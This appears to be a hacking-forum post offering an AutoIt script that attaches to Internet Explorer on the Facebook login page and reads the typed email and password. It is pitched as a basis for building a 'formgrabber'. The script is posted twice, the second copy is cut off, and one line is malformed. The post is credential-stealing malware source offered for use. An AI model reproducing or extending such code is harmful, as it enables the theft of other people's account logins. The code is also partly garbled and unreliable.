10 Years of Service
64%
Please note, if you want to make a deal with this user, that it is blocked.
A simple code to get email and password typed in internet explorer, you can create a "formgrabber" if you use the document event complete with some configured id's.
[HIDE-THANKS]
#include
$oIE = _IEAttach("https://www.facebook.com/", "url") ; attach the Script to read IE stuff !!
Local $oForm = _IEFormGetObjByName($oIE, "login_form") ; go to the LoginForm
Local $Email = _IEFormElementGetObjByName($oForm, "email") ; Read the email data
Local $Xtestre = _IEFormElementSetValue($oForm, "email")
Local $pass = _IEFormElementGetObjByName($oForm, "pass") ; Read the Password data
; Msgbox to show what it got
MsgBox(0, "Form info
", "Email/Username :" & _IEFormElementGetValue($Email) & @CRLF & "Password :" &_IEFormElementGetValue($pass))
[HIDE-THANKS]
#include
$oIE = _IEAttach("https://www.facebook.com/", "url") ; attach the Script to read IE stuff !!
Local $oForm = _IEFormGetObjByName($oIE, "login_form") ; go to the LoginForm
Local $Email = _IEFormElementGetObjByName($oForm, "email") ; Read the email data
Local $Xtestre = _IEFormElementSetValue($oForm, "email")
Local $pass = _IEFormElementGetObjByName($oForm, "pass") ; Read the Password data
; Msgbox to show what it got

MsgBox(0, "Form info

Code:
>